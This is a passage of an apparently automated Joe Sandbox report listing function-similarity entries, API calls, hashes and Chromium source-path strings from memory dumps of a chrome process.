                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: Value$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 2506987500-0
                                                                    • Opcode ID: ffedc6b9f4d50f966816defbbd570e44e59983cdc3cd6d46171ab145687e0d86
                                                                    • Instruction ID: 32727be72960dfeaaae26573cd72202c09580269a876216c00e57165973843b2
                                                                    • Opcode Fuzzy Hash: ffedc6b9f4d50f966816defbbd570e44e59983cdc3cd6d46171ab145687e0d86
                                                                    • Instruction Fuzzy Hash: CC413E20B1E247C1FA7CB7315592179E141AF447B0FD81B37E93E4AAD6DE3CB4428A21
                                                                    APIs
                                                                    Strings
                                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00007FF74CC3C913
                                                                    • Stability.BrowserExitCodes, xrefs: 00007FF74CC3C88D
                                                                    • ..\..\base\threading\hang_watcher.cc, xrefs: 00007FF74CC3C79A
                                                                    • UnregisterThread, xrefs: 00007FF74CC3C793
                                                                    • ..\..\third_party\libc++\src\include\vector:1547: assertion __position != end() failed: vector::erase(iterator) called with a non-dereferenceable iterator, xrefs: 00007FF74CC3C7F6
                                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00007FF74CC3C809
                                                                    • it != watch_states_.end(), xrefs: 00007FF74CC3C7B4
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$Acquire$Release
                                                                    • String ID: ..\..\base\threading\hang_watcher.cc$..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\vector:1547: assertion __position != end() failed: vector::erase(iterator) called with a non-dereferenceable iterator$Stability.BrowserExitCodes$UnregisterThread$it != watch_states_.end()
                                                                    • API String ID: 1678258262-2864508663
                                                                    • Opcode ID: bbda6ef2795bc7537ee9be41599fca50f2c8c7c087c91a797163aaf9926de40c
                                                                    • Instruction ID: 49c0f0bc7d8d50503c6df7b557ae6d2ce418c2d207671e689c2e8c02fb51716b
                                                                    • Opcode Fuzzy Hash: bbda6ef2795bc7537ee9be41599fca50f2c8c7c087c91a797163aaf9926de40c
                                                                    • Instruction Fuzzy Hash: 33917822B0DA56C2EA50FB21E8542B9A360BF85B94FC54233DE4E177A1DF3CE552C320
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$AcquireRelease$CounterPerformanceQuery
                                                                    • String ID: ..\..\base\threading\scoped_blocking_call_internal.cc$MonitorNextJankWindowIfNecessary$enable-background-thread-pool
                                                                    • API String ID: 1190089479-3676744455
                                                                    • Opcode ID: 7274f0130efee032fbfb1232228c069fa636f0dbded7a84d6bfef0f626abe692
                                                                    • Instruction ID: 60ebe4ab02f5bf8051c3b57f70632c7b33111cb1d36d78eca613d5fa01967874
                                                                    • Opcode Fuzzy Hash: 7274f0130efee032fbfb1232228c069fa636f0dbded7a84d6bfef0f626abe692
                                                                    • Instruction Fuzzy Hash: AA02AA21A0EB52C6EB60FB61E8853B9A3A0BB46754FC50533DA1E577A1DF3CE441E720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValue$DefaultLangUser
                                                                    • String ID: \StringFileInfo\%04hx%04hx\%ls$\VarFileInfo\Translation
                                                                    • API String ID: 2923350452-4158013653
                                                                    • Opcode ID: eddb2d11fa62c26326e4dc5c225307cf79be7a7a28e15a72666dd217f6738bbd
                                                                    • Instruction ID: 8ef56ed6fb2c341b7b6d22bac20e17b71b6a093fa8b4e424602052b424f8aa68
                                                                    • Opcode Fuzzy Hash: eddb2d11fa62c26326e4dc5c225307cf79be7a7a28e15a72666dd217f6738bbd
                                                                    • Instruction Fuzzy Hash: 33718D7261C74582FB14EF62E5543AAABA0BB46B90F804036EE8C47799CFBDD144C721
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF74CC374DC), ref: 00007FF74CD1166E
                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF74CC374DC), ref: 00007FF74CD1167E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: %s (errno: %d, %s)$..\..\third_party\perfetto\include\perfetto\tracing\track_event_category_registry.h$GetHandleVerifier$PERFETTO_CHECK(false && "A track event used an unknown category. Please add it to " "PERFETTO_DEFINE_CATEGORIES().")$wakeup.flow,toplevel.flow$~WaitableEvent while Signaled
                                                                    • API String ID: 1646373207-2914896919
                                                                    • Opcode ID: 8fc54c549b2d336b673932beabab8448d72f034f466b05fc1b45c5f0a418c365
                                                                    • Instruction ID: 17a0ff7700fdc213e1e55c7c8757490b58e9d2488efcee4f96a6787cfd004f13
                                                                    • Opcode Fuzzy Hash: 8fc54c549b2d336b673932beabab8448d72f034f466b05fc1b45c5f0a418c365
                                                                    • Instruction Fuzzy Hash: CC514569B0DA52C1FA50FB21E8512B9A3A1BF48B80FC45037DA4E177A6DF3DE545CB20
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00007FF74CD39E25
                                                                    • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,00007FF74CC53B9C,?,?,?,type,user-data-dir,?,00007FF74CC3DBC1), ref: 00007FF74CD39E32
                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,00007FF74CC53B9C,?,?,?,type,user-data-dir,?,00007FF74CC3DBC1), ref: 00007FF74CD39E83
                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,00007FF74CC53B9C,?,?,?,type,user-data-dir,?,00007FF74CC3DBC1), ref: 00007FF74CD3A053
                                                                    Strings
                                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00007FF74CD3A212
                                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00007FF74CD3A1FF
                                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00007FF74CD3A225
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$Acquire$CurrentReleaseThread
                                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr
                                                                    • API String ID: 1385397084-64851959
                                                                    • Opcode ID: 8e9ebbe3f4a339b31deb350076cffe8910ef54e6d4c81cdbcc0f1fb24c04cbd8
                                                                    • Instruction ID: 35609b9144bdbc1f76c9f9c1ce488661e89dd903bbce2567415ab2d41b0e8902
                                                                    • Opcode Fuzzy Hash: 8e9ebbe3f4a339b31deb350076cffe8910ef54e6d4c81cdbcc0f1fb24c04cbd8
                                                                    • Instruction Fuzzy Hash: 89C16E22B0EA52C3EA60FB52E444679A7A0BB45BC4F894133DE5E177A9DF3DE441C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$Acquire$Release
                                                                    • String ID: ..\..\base\task\sequence_manager\work_tracker.cc$E$ScopedAllowBaseSyncPrimitivesOutsideBlockingScope$WaitNoSyncWork
                                                                    • API String ID: 1678258262-2415033031
                                                                    • Opcode ID: c8922bd6856a11ff6d147e6266fe93dc7839985c0b4d5241d35d798861d0f353
                                                                    • Instruction ID: 037bf5365c5861ba19e520bab7ba4880c88b133919bee7ea0e69573967a878d9
                                                                    • Opcode Fuzzy Hash: c8922bd6856a11ff6d147e6266fe93dc7839985c0b4d5241d35d798861d0f353
                                                                    • Instruction Fuzzy Hash: 0A517D3560CB82D6EA60FB15E4503B9B3A0FB95B94F804133DA9D17BA5DF3DE05A8710
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: CloseErrorHandleLastObjectSingleThreadWait
                                                                    • String ID: ..\..\base\threading\platform_thread_win.cc$Join$ScopedBlockingCallWithBaseSyncPrimitives
                                                                    • API String ID: 813778123-1135135018
                                                                    • Opcode ID: 1428714ea95d305fce3a1cd94782050b66b37f27362b22e3fb51e929c5178db1
                                                                    • Instruction ID: 1f9778fdc237f463b7b725487734f7477b7b0eb824c8a60549c23f1d4fe348b9
                                                                    • Opcode Fuzzy Hash: 1428714ea95d305fce3a1cd94782050b66b37f27362b22e3fb51e929c5178db1
                                                                    • Instruction Fuzzy Hash: 0E316221A0C6D2D1FA60BB24F8157F6B360BF95784F808133DA8D526A5DF3CD14ACB20
                                                                    APIs
                                                                    Strings
                                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00007FF74CCE2C0B
                                                                    • ..\..\third_party\libc++\src\include\string:973: assertion __s != nullptr failed: basic_string(const char*) detected nullptr, xrefs: 00007FF74CCE2BF8
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$Acquire$Release
                                                                    • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string:973: assertion __s != nullptr failed: basic_string(const char*) detected nullptr
                                                                    • API String ID: 1678258262-1580066018
                                                                    • Opcode ID: 3072632d88c6212829ce4607a7628ccfb3bf0167a8c585a44c0484bb3bafcc43
                                                                    • Instruction ID: d4d92469a95b8d570a56ccc325520720d7111c352192bfd22ca51de4436839af
                                                                    • Opcode Fuzzy Hash: 3072632d88c6212829ce4607a7628ccfb3bf0167a8c585a44c0484bb3bafcc43
                                                                    • Instruction Fuzzy Hash: 6D719A22B0DA52C2EA20FF11E450279A7A1EB86F94FC54433DA0E473A5DF3DE482D720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLockLongNamePath$AcquireCounterPerformanceQueryRelease
                                                                    • String ID: ..\..\base\files\file_util_win.cc$MakeLongFilePath$ScopedBlockingCall
                                                                    • API String ID: 839722070-2989128051
                                                                    • Opcode ID: cb02e8f9c26450899bbc813f1b20448526e5dc916b0b39cee132e87e1aff0939
                                                                    • Instruction ID: a87c788bd34b56183145153537412c6f4b7fcbc46f2edb0a6a4f37964cda0397
                                                                    • Opcode Fuzzy Hash: cb02e8f9c26450899bbc813f1b20448526e5dc916b0b39cee132e87e1aff0939
                                                                    • Instruction Fuzzy Hash: FF41BE22B1DB92C1FA21FB25E4117BAA361FF85784F849132EA8D07655EF3CE1968710
                                                                    APIs
                                                                    • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00007FF74CC374B0), ref: 00007FF74CC375AD
                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00007FF74CC374B0), ref: 00007FF74CC375E4
                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00007FF74CC374B0), ref: 00007FF74CC376BC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$Acquire$Release
                                                                    • String ID: ..\..\base\threading\thread.cc$StopSoon
                                                                    • API String ID: 1678258262-4240870308
                                                                    • Opcode ID: 24a223ecafd796875a8ed6c0166f01cb3ccc81ed628490e995fb77dcaf760f9e
                                                                    • Instruction ID: afda33144ed83593aa3d18c91887c1ac8b3bdc264da8cfa2f972c6ecd41f2522
                                                                    • Opcode Fuzzy Hash: 24a223ecafd796875a8ed6c0166f01cb3ccc81ed628490e995fb77dcaf760f9e
                                                                    • Instruction Fuzzy Hash: DD414535B0DB42C2EA54FB29F5502A8B3A4EB89B94F894033CA4D037A4DF3CE452C720
                                                                    APIs
                                                                    • ResetEvent.KERNEL32(?,?,?,?,00000000,00000010,?,?,00007FF74CC39851), ref: 00007FF74CC39A25
                                                                    • ResetEvent.KERNEL32(?,?,?,?,00000000,00000010,?,?,00007FF74CC39851), ref: 00007FF74CC39AB7
                                                                    • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00000010,?,?,00007FF74CC39851), ref: 00007FF74CC39AC4
                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00000010,?,?,00007FF74CC39851), ref: 00007FF74CC39AFB
                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00000010,?,?,00007FF74CC39851), ref: 00007FF74CC39BBA
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
